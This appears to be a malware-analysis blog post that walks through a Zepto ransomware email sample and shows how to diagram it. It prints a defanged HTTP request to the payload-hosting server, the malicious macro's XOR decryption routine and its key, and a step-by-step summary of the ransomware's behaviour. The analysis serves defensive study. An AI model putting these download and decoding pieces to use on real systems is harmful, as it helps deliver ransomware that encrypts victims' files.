Zepto Ransomware Diagram How-To

I really wanted to find a fresh malware to analyze and demonstrate how I usually make malware diagrams. I trolled on virustotal.com and found a recently uploaded email (9/4/2016) and originally delivered (8/11/2016). I really had no idea what malware it had, so it was an adventure. Here is the details of all files involved:

Email: c2ef6192f6c1f163ed69a7c5659afb90
Attachment: a44130159570d9aef99796023b2614be (NewXDocX879-2.docm)
ZeptoPayload: d9a87bd83afcd5cbf6c5fcc4123bbdb1e9d30302 (turbis.exe)

Zepto ransomware is actually a derivative of Locky. There are already many great blogs about both types of ransomware. Hopefully this video is helpful in malware diagram creation 🙂

Diagram How-To Video

Get Icons here: https://www.iconfinder.com

Email Extraction

How to extract the attachment from an eml file:
sudo apt-get install mpack
To extract the eml contents:
$munpack youremail.eml


Attachment

a44130159570d9aef99796023b2614be  (NewXDocX879-2.docm)
Seeing that this extention is”docm” means this lovely document is using VBA Macros. Using 7zip you can unzip document container and see the contents of the file. VBAproject.bin is the vba macro we want to look at. So let’s use the python extension oletools to extract the macro data.

Payload Download

How to get the traffic fast:

HTTP Request

http://iceninegr[.]web[.]fc2[.]com/4GBrdf6
GET /4GBrdf6 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: iceninegr[.]web[.]fc2[.]com
Connection: Keep-Alive

Encrypted Turbis Exe

Decoding function in VBA Maco

UNDOPRYXOR GromGremitKustiTryasutsyaUUUKABBB, GromGremitKustiTryasutsyaUUUKA, "1DewxHpdrG2Xe2xWVa1XwFG6hJ1Cti30"

which points to:

Public Sub DecryptByte(ByteArray() As Byte, Key As String)
  Dim Offset As Long
  Dim ByteLen As Long
  Dim ResultLen As Long
  Dim CurrPercent As Long
  Dim NextPercent As Long
  Dim m_Key() As Byte
  Dim m_KeyLen As Long
  m_KeyLen = Len(Key)

ReDim m_Key(m_KeyLen)
  m_Key = StrConv(Key, vbFromUnicode)
  ByteLen = UBound(ByteArray) + 1
  ResultLen = ByteLen
  For Offset = 0 To (ByteLen - 1)
    ByteArray(Offset) = ByteArray(Offset) Xor m_Key(Offset Mod m_KeyLen)
    If (Offset >= NextPercent) Then
      CurrPercent = Int((Offset / ResultLen) * 100)
      NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
    End If
  Next
End Sub

Decryption Key

“1DewxHpdrG2Xe2xWVa1XwFG6hJ1Cti30”

Write a simple python script to decode

Download it here

$python xorbyte_decode > turbis.exe

Zepto Payload

d9a87bd83afcd5cbf6c5fcc4123bbdb1e9d30302   turbis.exe
ZeptoRansomware
  1. Payload is downloaded from its C&C repo using wscript.shell
  2. Payload turbis.exe is xor decoded and saved in %TEMP%
  3. Registry keys are set up for persistence and encryption
  4. A new thread containing shellcode is executed where all communication is through com objects in a memory channel
  5. Posts to the C&C server of the compromise and encryption key
  6. Begins to recursively encrypt files on the system
  7. Places a ransom note in each leaf folder and displays the ransom notes